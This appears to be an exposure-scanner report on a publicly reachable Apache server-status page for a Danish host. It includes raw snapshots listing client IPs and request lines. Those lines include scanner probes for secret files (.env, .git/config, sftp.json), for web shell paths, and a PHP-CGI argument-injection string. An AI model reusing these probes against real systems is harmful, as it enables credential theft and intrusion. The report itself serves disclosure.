Apache
tcp/80
cloudflare
tcp/443 tcp/80 tcp/8443
The server-status page (usually /server-status
) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3e64c3298
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Friday, 22-Nov-2024 10:13:52 CET Restart Time: Friday, 22-Nov-2024 06:05:04 CET Parent Server Generation: 4 Server uptime: 4 hours 8 minutes 48 seconds Total accesses: 20818 - Total Traffic: 11.7 MB CPU Usage: u5.66 s1.2 cu0 cs0 - .046% CPU load 1.39 requests/sec - 820 B/second - 588 B/request 1 requests currently being processed, 35 idle workers __________W_________________________............................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-440050/34/588_ 0.10200.00.010.22 165.22.34.189webhotel5.webhosting.dkGET /server HTTP/1.0 1-440060/36/578_ 0.11510.00.010.22 209.38.208.202webhotel5.webhosting.dkGET /server-status HTTP/1.0 2-440070/32/568_ 0.06500.00.010.19 209.38.208.202webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 3-440080/35/576_ 0.14500.00.010.30 209.38.208.202webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 4-440090/36/587_ 0.11500.00.010.27 209.38.208.202webhotel5.webhosting.dkGET /config.json HTTP/1.0 5-440100/36/573_ 0.11560.00.010.28 209.38.208.202webhotel5.webhosting.dkGET /?rest_route=/wp/v2/users/ HTTP/1.0 6-440110/35/580_ 0.11200.00.010.20 157.245.14.175webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 7-440120/35/567_ 0.11100.00.010.25 165.22.34.189webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 8-440130/35/546_ 0.10000.00.010.20 165.22.34.189webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 9-440140/35/550_ 0.12000.00.020.21 165.22.34.189webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 10-440150/34/555W 0.09000.00.010.21 165.22.34.189webhotel5.webhosting.dkGET /server-status HTTP/1.0 11-440160/34/554_ 0.101200.00.010.20 144.126.145.58webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 12-440200/33/535_ 0.08600.00.010.19 209.38.208.202webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 13-440170/33/539_ 0.091100.00.010.29 20.218.121.94webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 14-440210/34/542_ 0.09600.00.011.32 209.38.208.202webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 15-440180/34/533_ 0.09740.00.010.17 209.38.208.202webhotel5.webhosting.dkGET / HTTP/1.0 16-440190/33/526_ 0.10640.00.010.18 209.38.208.202webhotel5.webhosting.dkGET / HTTP/1.0 17-440220/33/510_ 0.10600.00.010.18 209.38.208.202webhotel5.webhosting.dkGET /server HTTP/1.0 18-440230/34/513_ 0.10600.00.020.22 209.38.208.202webhotel5.webhosting.dkGET /about HTTP/1.0 19-440240/34/508_ 0.11600.00.010.22 209.38.208.202webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 20-440770/32/509_ 0.12500.00.010.17 209.38.208.202webhotel5.webhosting.dkGET /login.action HTTP/1.0 21-441040/33/503_ 0.11500.00.010.23 209.38.208.202webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 22-441100/33/508_ 0.12340.00.010.17 127.0.0.1webhotel5.webhosting.dkr?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.0 23-441230/35/511_ 0.11280.00.010.21 165.22.34.189webhotel5.webhosting.dkGET / HTTP/1.0 24-441310/34/478_ 0.11200.00.010.16 165.22.34.189webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 25-442010/32/494_ 0.09100.00.010.21 165.22.34.189webhotel5.webhosting.dkGET /about HTTP/1.0 26-442270/33/491_ 0.10100.00.020.32 165.22.34.189webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 27-442730/33/489_ 0.10000.00.010.17 159.65.0.171webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 28-442980/29/472_ 0.1016730.00.010.16 54.164.144.89webhotel5.webhosting.dkGET / HTTP/1.0 29-443260/34/447_ 0.08812200.00.010.14 69.163.140.195webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 30-444170/34/450_ 0.126100.00.011.88 165.22.34.189webhotel5.webhosting.dkGET / HTTP/1.0 31-444210/33/441_ 0.10600.00.010.20 209.38.208.202webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 32-444220/34/451_ 0.12500.00.010.27 209.38.208.202webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 33-4120100/22/359_ 0.06500.00.010.12 209.38.208.202webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 34-4120200/20/382_ 0.03500.00.000.12 209.38.208.202webhotel5.webhosting.dkGET /.env HTTP/1.0 35-4120210/20/367_ 0.04500.00.010.23 209.38.208.202webhotel5.webhosting.dkGET /.git/config HTTP/1.0 36-3-0/0/293. 0.12174500.00.000.10 62.146.234.248webhotel5.webhosting.dkGET /install.php HTTP/1.0 37-3-0/0/204. 0.16109760.00.000.48 172.71.151.81webhotel5.webhosting.dkGET /?find-new%2F2033027%2Fposts HTTP/1.0 38-3-0/0/199. 0.15109960.00.000.09 172.71.146.231webhotel5.webhosting.dkGET /?find-new%2F2033025%2Fposts HTTP/1.0 39-3-0/0/198. 0.20109540.00.000.06 172.71.147.54webhotel5.webhosting.dkGET /?find-new%2F2033828%2Fposts HTTP/1.0 40-3-0/0/205. 0.18109800.00.000.07 155.248.250.253webhotel5.webhosting.dkGET /apps HTTP/1.0 41-3-0/0/205. 0.17109670.00.000.07 172.71.142.35webhotel5.webhosting.dkGET /?find-new%2F2033209%2Fposts HTTP/1.0 42-3-0/0/157. 0.17109400.00.000.07 23.252.178.39webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 43-3-0/0/153. 0.15109200.00.000.09 59.93.88.224webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 44-3-0/0/147. 0.18109360.00.000.06 162.158.41.154webhotel5.webhosting.dkGET /?find-new%2F2033995%2Fposts HTTP/1.0 45-3-0/0/102. 0.18109060.00.000.08 162.158.41.154webhotel5.webhosting.dkGET /?find-new%2F2034054%2Fposts HTTP/1.0 46-3-0/0/96. 0.17108900.00.000.06 213.202.247.126webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 47-3-0/0/93. 0.20108900.00.000.04 20.253.160.45webhotel5.webhosting.dkGET /wp-login.php HTTP/1.0 48-3-0/0/95. 0.19108640.00.000.04 64.226.101.19webhotel5.webhosting.dkGET / HTTP/1.0 49-3-0/0/47. 0.17108950.00.000.01 172.71.147.185webhotel5.webhosting.dkGET /?find-new%2F2034202%2Fposts HTTP/1.0 50-3-0/0/50. 0.21108840.00.000.02 172.71.142.7webhotel5
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde316d9a189
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Thursday, 21-Nov-2024 00:29:29 CET Restart Time: Wednesday, 20-Nov-2024 16:05:04 CET Parent Server Generation: 8 Server uptime: 8 hours 24 minutes 25 seconds Total accesses: 55980 - Total Traffic: 32.3 MB CPU Usage: u2.75 s.65 cu0 cs0 - .0112% CPU load 1.85 requests/sec - 1119 B/second - 605 B/request 1 requests currently being processed, 37 idle workers _____________....._...__W_____________________.................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-821700/30/1684_ 0.06000.00.010.54 209.38.248.17webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 1-821720/27/1659_ 0.05000.00.010.80 64.227.70.2webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 2-821730/30/1654_ 0.06000.00.010.62 209.38.248.17webhotel5.webhosting.dkGET /.env HTTP/1.0 3-821850/30/1640_ 0.06010.00.101.02 209.38.248.17webhotel5.webhosting.dkGET /.git/config HTTP/1.0 4-821860/28/1626_ 0.04000.00.011.26 64.227.70.2webhotel5.webhosting.dkGET /server HTTP/1.0 5-821890/29/1639_ 0.05000.00.000.73 48.210.68.244webhotel5.webhosting.dkHEAD /bk HTTP/1.0 6-821900/29/1625_ 0.05000.00.000.83 209.38.248.17webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 7-821910/28/1631_ 0.04000.00.010.86 64.227.70.2webhotel5.webhosting.dkGET /about HTTP/1.0 8-821920/30/1630_ 0.06000.00.020.69 209.38.248.17webhotel5.webhosting.dkGET /config.json HTTP/1.0 9-821940/27/1589_ 0.05000.00.090.78 209.38.248.17webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 10-821950/29/1592_ 0.05000.00.011.00 64.227.70.2webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 11-821960/29/1589_ 0.06040.00.010.65 209.38.248.17webhotel5.webhosting.dkGET /?rest_route=/wp/v2/users/ HTTP/1.0 12-821970/27/1586_ 0.05000.00.010.73 64.227.70.2webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 13-8-0/0/1548. 0.1691800.00.000.92 172.70.230.134webhotel5.webhosting.dkGET /wp-admin/setup-config.php HTTP/1.0 14-8-0/0/1561. 0.1986400.00.001.64 167.71.36.29webhotel5.webhosting.dkGET /0.tar.gz HTTP/1.0 15-8-0/0/1526. 0.1791200.00.001.04 89.248.163.130webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 16-8-0/0/1522. 0.1491100.00.000.70 167.71.36.29webhotel5.webhosting.dkGET /wp-admin.tgz HTTP/1.0 17-8-0/0/1492. 0.1590600.00.001.10 167.71.36.29webhotel5.webhosting.dkGET /ludospil.dkbackup.tar.gz HTTP/1.0 18-821820/29/1557_ 0.05000.00.010.97 66.249.74.131webhotel5.webhosting.dkGET /en/gallery/detail/JN0030-3993 HTTP/1.0 19-8-0/0/1519. 0.2090300.00.000.70 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 20-8-0/0/1521. 0.1590300.00.002.14 167.71.36.29webhotel5.webhosting.dkGET /adminer/index.php HTTP/1.0 21-8-0/0/1532. 0.1881700.00.001.26 20.244.93.104webhotel5.webhosting.dkGET /.well-known/ HTTP/1.0 22-813260/33/1523_ 0.06000.00.010.75 64.227.70.2webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 23-821980/26/1407_ 0.04000.00.000.61 48.210.68.244webhotel5.webhosting.dkHEAD /backup HTTP/1.0 24-821990/29/1414W 0.04000.00.010.95 64.227.70.2webhotel5.webhosting.dkGET /server-status HTTP/1.0 25-822000/28/1361_ 0.05250.00.010.63 209.38.248.17webhotel5.webhosting.dkGET / HTTP/1.0 26-822010/28/1402_ 0.05100.00.012.43 48.210.68.244webhotel5.webhosting.dkHEAD /wordpress HTTP/1.0 27-822070/27/1345_ 0.04150.00.010.41 64.227.70.2webhotel5.webhosting.dkGET / HTTP/1.0 28-822090/25/1333_ 0.04100.00.000.54 209.38.248.17webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 29-822100/28/1291_ 0.07100.00.010.46 209.38.248.17webhotel5.webhosting.dkGET /server HTTP/1.0 30-822110/28/1292_ 0.05100.00.010.54 209.38.248.17webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 31-819940/31/1170_ 0.04000.00.010.49 167.71.36.29webhotel5.webhosting.dkGET /adminer-4.6.2.php HTTP/1.0 32-820010/31/1129_ 0.05000.00.010.44 64.227.70.2webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 33-820020/30/1010_ 0.06140.00.010.29 209.38.248.17webhotel5.webhosting.dkGET / HTTP/1.0 34-822150/28/986_ 0.06140.00.010.49 48.210.68.244webhotel5.webhosting.dkHEAD / HTTP/1.0 35-822160/29/950_ 0.06100.00.000.85 209.38.248.17webhotel5.webhosting.dkGET /about HTTP/1.0 36-822810/28/904_ 0.05000.00.010.57 209.38.248.17webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 37-822830/27/792_ 0.05100.00.000.31 209.38.248.17webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 38-822840/29/571_ 0.04000.00.010.24 209.38.248.17webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 39-822850/28/319_ 0.05000.00.000.08 48.210.68.244webhotel5.webhosting.dkHEAD /wp HTTP/1.0 40-822860/26/225_ 0.04000.00.000.07 66.249.74.132webhotel5.webhosting.dkGET /robots.txt HTTP/1.0 41-822870/28/127_ 0.05010.00.010.05 209.38.248.17webhotel5.webhosting.dkGET /server-status HTTP/1.0 42-822880/27/127_ 0.06000.00.010.04 209.38.248.17webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 43-822900/29/128_ 0.05000.00.010.03 209.38.248.17webhotel5.webhosting.dkGET /login.action HTTP/1.0 44-822910/27/123_ 0.04040.00.010.03 64.227.70.2webhotel5.webhosting.dkGET / HTTP/1.0 45-822920/29/79_ 0.05000.00.010.02 48.210.68.244webhotel5.webhosting.dkHEAD /bc HTTP/1.0 46-4-0/0/50. 0.141266300.00.000.02 74.208.27.149webhotel5.webhosting.dkGET /wp-content/plugins/index.php HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request ReqMilliseconds required to process most recent request ConnKilobytes transferred this connection ChildMegabytes transferred this child SlotTotal megabytes transferred this slot Apache Server at www.go4love.dk Port 443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde37036838e
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Monday, 18-Nov-2024 15:12:37 CET Restart Time: Monday, 18-Nov-2024 06:05:04 CET Parent Server Generation: 9 Server uptime: 9 hours 7 minutes 32 seconds Total accesses: 68849 - Total Traffic: 108.0 MB CPU Usage: u3.54 s.66 cu0 cs0 - .0128% CPU load 2.1 requests/sec - 3448 B/second - 1645 B/request 1 requests currently being processed, 32 idle workers _____________________________W___............................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-9607350/29/2022_ 0.063800.00.012.86 194.67.207.94www.discteknik.dkHEAD / HTTP/1.0 1-9607380/24/2011_ 0.086400.00.012.59 155.248.250.253webhotel5.webhosting.dkET /modules/cartabandonmentpro/uploads/bbaccaa.php.png HTTP/1.0 2-9607360/22/2007_ 0.084600.00.012.63 193.39.9.129webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 3-9607370/25/1962_ 0.0842570.00.021.17 92.118.39.244webhotel5.webhosting.dkGET / HTTP/1.0 4-9607390/26/2007_ 0.075700.00.012.74 66.249.66.169webhotel5.webhosting.dkGET /media/catalog/product/i/m/img_5100_1_2.jpg HTTP/1.0 5-9607400/24/1954_ 0.05390.00.012.25 45.156.128.71webhotel5.webhosting.dkGET / HTTP/1.0 6-9607410/25/1964_ 0.0742130.00.012.50 157.250.160.25www.all2one.dkGET /it_projektlederen.html HTTP/1.0 7-9607420/23/1999_ 0.066900.00.011.28 157.250.160.25www.brandstation.infoPOST /owa/auth.owa HTTP/1.0 8-9607430/25/1959_ 0.074000.00.012.59 185.5.249.185www.discteknik.dkHEAD / HTTP/1.0 9-9607440/24/2006_ 0.06000.00.011.19 165.227.173.41webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 10-9608270/23/1942_ 0.084410.00.016.62 157.250.160.11webhotel5.webhosting.dkGET / HTTP/1.0 11-9607450/22/1952_ 0.076830.00.013.91 199.45.155.93webhotel5.webhosting.dkGET / HTTP/1.0 12-9607460/24/1957_ 0.087200.00.013.97 157.250.160.25www.brandstation.infoPOST /owa/auth.owa HTTP/1.0 13-9607470/24/1912_ 0.04720.00.012.53 165.231.182.92webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 14-9607480/24/1905_ 0.07140.00.014.05 165.227.173.41webhotel5.webhosting.dkGET / HTTP/1.0 15-9607490/24/1860_ 0.076900.00.012.47 157.250.160.25www.brandstation.infoPOST /owa/auth.owa HTTP/1.0 16-9607500/24/1903_ 0.075100.00.012.54 66.249.66.169webhotel5.webhosting.dkT /media/catalog/product/g/u/gulvbeskytter_elho3_6.jpg HTTP/1.0 17-9607510/25/1874_ 0.09000.00.013.88 165.227.173.41webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 18-9607520/24/1874_ 0.067300.00.016.81 66.249.66.169webhotel5.webhosting.dkGET /media/catalog/product/p/l/plante_opsats.jpg HTTP/1.0 19-9607530/22/1735_ 0.087100.00.012.58 157.250.160.25www.brandstation.infoPOST /owa/auth.owa HTTP/1.0 20-9608590/23/1753_ 0.072800.00.011.33 104.255.164.76webhotel5.webhosting.dkGET /min-side/log-ind.aspx HTTP/1.0 21-9609030/22/1745_ 0.05700.00.010.96 66.249.70.33webhotel5.webhosting.dkGET /.well-known/assetlinks.json HTTP/1.0 22-9609170/24/1749_ 0.07000.00.013.72 165.227.173.41webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 23-9609360/23/1672_ 0.05030.00.012.53 165.227.173.41webhotel5.webhosting.dkGET / HTTP/1.0 24-9609450/23/1723_ 0.06000.00.015.03 165.227.173.41webhotel5.webhosting.dkGET /server HTTP/1.0 25-9607540/24/1740_ 0.087000.00.010.89 157.250.160.25www.brandstation.infoPOST /owa/auth.owa HTTP/1.0 26-9609470/23/1663_ 0.05000.00.031.21 165.227.173.41webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 27-9609480/24/1574_ 0.06000.00.013.63 165.227.173.41webhotel5.webhosting.dkGET /about HTTP/1.0 28-9609690/24/1576_ 0.07000.00.012.50 165.227.173.41webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 29-9609710/21/1577W 0.07000.00.012.37 165.227.173.41webhotel5.webhosting.dkGET /server-status HTTP/1.0 30-9620630/20/1568_ 0.076440.00.016.41 199.45.155.93webhotel5.webhosting.dkGET / HTTP/1.0 31-9620930/20/1451_ 0.056300.00.011.21 155.248.250.253webhotel5.webhosting.dkGET /upload/cbbaaba.html HTTP/1.0 32-9620940/20/1462_ 0.066200.00.011.07 199.45.155.93webhotel5.webhosting.dkGET /favicon.ico HTTP/1.0 33-8-0/0/1356. 0.14141260.00.000.89 162.158.42.92webhotel5.webhosting.dkGET /?find-new%2F2115389%2Fposts HTTP/1.0 34-8-0/0/1273. 0.13141230.00.002.26 172.68.22.172webhotel5.webhosting.dkGET /?find-new%2F2113531%2Fposts HTTP/1.0 35-8-0/0/1007. 0.14141160.00.000.75 172.68.23.162webhotel5.webhosting.dkGET /?find-new%2F2115690%2Fposts HTTP/1.0 36-8-0/0/1013. 0.14141060.00.002.03 108.162.245.11webhotel5.webhosting.dkGET /?find-new%2F2116202%2Fposts HTTP/1.0 37-8-0/0/941. 0.1274800.00.003.40 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 38-8-0/0/723. 0.151409660.00.000.44 185.147.125.16webhotel5.webhosting.dkGET / HTTP/1.0 39-8-0/0/590. 0.1374800.00.000.31 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 40-8-0/0/418. 0.1274800.00.000.33 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 41-8-0/0/336. 0.13137920.00.000.35 172.68.23.162webhotel5.webhosting.dkGET /?find-new%2F2126629%2Fposts HTTP/1.0 42-8-0/0/334. 0.14140930.00.001.26 162.158.41.154webhotel5.webhosting.dkGET /?find-new%2F2116358%2Fposts HTTP/1.0 43-8-0/0/269. 0.1074800.00.000.34 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 44-8-0/0/198. 0.1174800.00.000.22 ::1webhotel5-64bit.webhosting.dkOPTIONS * HTTP/1.0 45-7-0/0/117. 0.12699230.00.000.03 172.71.147.3webhotel5.webhosting.dkGET /?find-new%2F2597169%2Fposts HTTP/1.0 46-7-0/0/117. 0.10699130.00.001.38 172.71.150.232webhotel5.webhosting.dkGET /?find-new%2F2597423%2Fposts HTTP/1.0 47-7-0/0/49. 0.11699230.00.000.02 172.68.22.173webhotel5.webhosting.dkGET /?find-new%2F2597268%2Fposts HTTP/1.0 48-7-0/0/50. 0.12699160.00.000.01 108.162.245.231webhotel5.webhosting.dkGET /?find-new%2F2597440%2Fposts HTTP/1.0 SrvChild Server number - generation PIDOS process ID AccNumber of accesses this connection / this child / this slot MMode of operation CPUCPU usage, number of seconds SSSeconds since beginning of most recent request
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7effde3d7effde3b691bf0e
Apache Status Apache Server Status for www.go4love.dk Server Version: Apache/2.2.34 (Unix) PHP/5.2.17 Server Built: Oct 8 2019 02:07:04 Current Time: Saturday, 16-Nov-2024 15:22:59 CET Restart Time: Saturday, 16-Nov-2024 06:05:04 CET Parent Server Generation: 9 Server uptime: 9 hours 17 minutes 55 seconds Total accesses: 56564 - Total Traffic: 39.9 MB CPU Usage: u2.5 s.81 cu0 cs0 - .00989% CPU load 1.69 requests/sec - 1249 B/second - 739 B/request 1 requests currently being processed, 33 idle workers ___________________W______________.............................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientVHostRequest 0-9452450/40/1623_ 0.061300.00.010.72 206.189.2.13webhotel5.webhosting.dkGET /config.json HTTP/1.0 1-9452460/39/1627_ 0.081160.00.071.81 54.36.149.106www.valloe.orgGET /pictures/cbf0505.jpg HTTP/1.0 2-9452470/40/1626_ 0.06350.00.061.96 147.182.149.75webhotel5.webhosting.dkGET / HTTP/1.0 3-9452530/38/1617_ 0.06000.00.011.15 147.182.149.75webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 4-9452590/36/1522_ 0.051300.00.010.63 206.189.2.13webhotel5.webhosting.dkGET /_all_dbs HTTP/1.0 5-9452540/38/1622_ 0.061430.00.010.63 206.189.2.13webhotel5.webhosting.dkGET / HTTP/1.0 6-9452480/41/1615_ 0.07200.00.010.69 147.182.149.75webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 7-9452600/36/1609_ 0.041300.00.010.94 206.189.2.13webhotel5.webhosting.dkGET /.DS_Store HTTP/1.0 8-9452620/35/1610_ 0.07220.00.021.22 194.67.207.55www.discteknik.dkHEAD / HTTP/1.0 9-9452610/35/1542_ 0.051300.00.081.92 206.189.2.13webhotel5.webhosting.dkGET /.env HTTP/1.0 10-9452490/40/1578_ 0.05100.00.141.48 147.182.149.75webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 11-9452630/35/1618_ 0.071300.00.010.98 206.189.2.13webhotel5.webhosting.dkGET /.git/config HTTP/1.0 12-9452640/37/1574_ 0.05660.00.011.06 147.182.149.75webhotel5.webhosting.dkGET / HTTP/1.0 13-9452650/36/1562_ 0.061300.00.010.86 206.189.2.13webhotel5.webhosting.dkGET /telescope/requests HTTP/1.0 14-9452690/37/1569_ 0.071220.00.010.83 206.189.2.13webhotel5.webhosting.dkGET /?rest_route=/wp/v2/users/ HTTP/1.0 15-9452500/40/1574_ 0.05200.00.012.36 147.182.149.75webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 16-9452700/38/1493_ 0.05700.00.010.84 13.39.16.76webhotel5.webhosting.dkGET /wp-includes/item.php HTTP/1.0 17-9452740/38/1488_ 0.06600.00.010.74 13.39.16.76webhotel5.webhosting.dkGET /.well-known/pki-validation/bless.php HTTP/1.0 18-9452920/39/1478_ 0.06200.00.011.75 147.182.149.75webhotel5.webhosting.dkGET /server HTTP/1.0 19-9452930/37/1358W 0.05000.00.010.97 147.182.149.75webhotel5.webhosting.dkGET /server-status HTTP/1.0 20-9452950/36/1394_ 0.051400.00.010.67 206.189.2.13webhotel5.webhosting.dkGET /server HTTP/1.0 21-9452980/34/1369_ 0.061400.00.010.84 206.189.2.13webhotel5.webhosting.dkw_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 22-9453000/35/1358_ 0.061400.00.010.74 13.39.16.76webhotel5.webhosting.dkGET /wp-includes/PHPMailer/radio.php HTTP/1.0 23-9453050/36/1354_ 0.061400.00.010.48 206.189.2.13webhotel5.webhosting.dkGET /about HTTP/1.0 24-9465190/33/1323_ 0.051300.00.010.71 206.189.2.13webhotel5.webhosting.dkl/microsoft.exchange.ediscovery.exporttool.application HTTP/1.0 25-9475610/30/1265_ 0.041310.00.030.77 206.189.2.13webhotel5.webhosting.dkGET /server-status HTTP/1.0 26-9520890/25/1264_ 0.03100.00.010.52 147.182.149.75webhotel5.webhosting.dkGET /about HTTP/1.0 27-9452510/40/1310_ 0.06000.00.011.82 147.182.149.75webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 28-9452520/39/1293_ 0.06100.00.031.31 13.39.16.76webhotel5.webhosting.dkGET /wp-content/class_api.php HTTP/1.0 29-9452550/35/1277_ 0.051400.00.010.81 206.189.2.13webhotel5.webhosting.dkGET /.vscode/sftp.json HTTP/1.0 30-9542870/17/1214_ 0.011300.00.000.65 206.189.2.13webhotel5.webhosting.dkven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.0 31-9452560/36/1097_ 0.061300.00.010.59 206.189.2.13webhotel5.webhosting.dkGET /debug/default/view?panel=config HTTP/1.0 32-9452570/36/1128_ 0.071300.00.010.99 206.189.2.13webhotel5.webhosting.dkGET /v2/_catalog HTTP/1.0 33-9452580/36/992_ 0.071300.00.021.12 206.189.2.13webhotel5.webhosting.dkGET /login.action HTTP/1.0 34-8-0/0/939. 0.10271000.00.000.78 34.173.210.95webhotel5.webhosting.dkGET /login/ HTTP/1.0 35-8-0/0/860. 0.12271000.00.000.47 34.173.210.95webhotel5.webhosting.dkGET /login/ HTTP/1.0 36-8-0/0/885. 0.10271010.00.000.43 13.39.16.76webhotel5.webhosting.dkGET /.well-known/pki-validation/class_api.php HTTP/1.0 37-8-0/0/751. 0.09270900.00.000.24 34.173.210.95webhotel5.webhosting.dkGET /login/ HTTP/1.0 38-8-0/0/465. 0.13270700.00.000.30 94.102.51.98webhotel5.webhosting.dkPOST /wp-json/tdw/save_css HTTP/1.0 39-8-0/0/443. 0.10270300.00.000.40 